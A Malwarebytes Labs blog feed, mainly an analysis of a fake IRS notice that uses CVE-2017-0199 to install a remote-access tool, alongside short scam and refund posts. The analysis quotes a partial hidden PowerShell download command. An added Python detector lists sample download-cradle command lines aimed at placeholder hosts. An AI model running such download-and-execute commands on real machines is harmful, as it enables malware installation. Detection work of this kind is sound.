It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they originally were, licensed music has been replaced, the control scheme is different, or maybe it works on this console but not properly on that mobile device, and anyway it’s funded by ads, and so on.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

fake emulator

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!


The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.


Sep 21, 2017

Fake IRS notice delivers customized spying tool

While macro-based documents and scripts make up the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.


The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.


The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.


-WindowStyle Hidden (New-Object System.Net.WebClient)


The downloaded payload (intelgfx.exe) extracts several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, so that it remains invisible to the victim.
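As an added defender-side example (not code from the Malwarebytes post), the following Python checks constructed process-creation events for the two behaviours of this delivery chain: an Office application or mshta.exe spawning a script host, and a hidden-window PowerShell download cradle like the fragment quoted above. The event format, host names and paths are assumptions.

```python
import re

# Constructed sample process-creation events, not taken from the article:
# (pid, parent image, image, command line). Hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    (100, "explorer.exe", "winword.exe", "winword.exe CP2000_notice.doc"),
    (101, "winword.exe", "mshta.exe", "mshta.exe http://ftp-host.invalid/update.hta"),
    (102, "mshta.exe", "powershell.exe",
     "powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient)"
     ".DownloadFile('http://ftp-host.invalid/intelgfx.exe','C:\\Users\\u\\intelgfx.exe')"),
    (103, "explorer.exe", "powershell.exe", "powershell.exe -NoProfile Get-Process"),
    (104, "cmd.exe", "powershell.exe",
     "powershell.exe -w hidden (New-Object Net.WebClient).DownloadString('http://x.invalid/a')"),
]

# Parents that should rarely launch a script host in a normal user session.
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "mshta.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Two common spellings of the hidden-window switch (full name and "-w").
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Typical PowerShell download primitives, including the WebClient one shown above.
DOWNLOAD_CRADLE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient|invoke-webrequest|downloadstring|downloadfile",
    re.IGNORECASE)


def classify(event):
    """Return the names of the rules an event matches (empty list if none)."""
    _pid, parent, image, cmdline = event
    hits = []
    if parent.lower() in SUSPECT_PARENTS and image.lower() in SCRIPT_HOSTS:
        hits.append("office-or-mshta-spawns-script-host")
    if (image.lower() == "powershell.exe"
            and HIDDEN_WINDOW.search(cmdline)
            and DOWNLOAD_CRADLE.search(cmdline)):
        hits.append("hidden-powershell-download-cradle")
    return hits


def detect(events):
    """Map pid -> matched rule names for every event that triggers a rule."""
    return {e[0]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS).items():
        print(pid, rules)
```

Event 103 (an interactive, non-hidden PowerShell run) is deliberately left unflagged to show that the cradle rule keys on the combination of hidden window and download primitive, not on PowerShell alone.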

RMS stands for Remote Manipulator System; the RMS agent is a remote control application made by a Russian company. It appears that in this case the attackers took the original program (pictured below) and slightly customized it, and of course they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 has been used to distribute a RAT. Last August, TrendMicro described an attack in which the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload, which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199


HTA script


Main package (intelgfx.exe)


RAT module


Other IOCs from same distribution server


The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.


Sep 20, 2017

FTC providing partial refunds for Advanced Tech Support victims

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice. And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.


Sep 20, 2017

A week in security (September 11 – September 17)

Last week, we dug into phishing campaigns run via LinkedIn accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

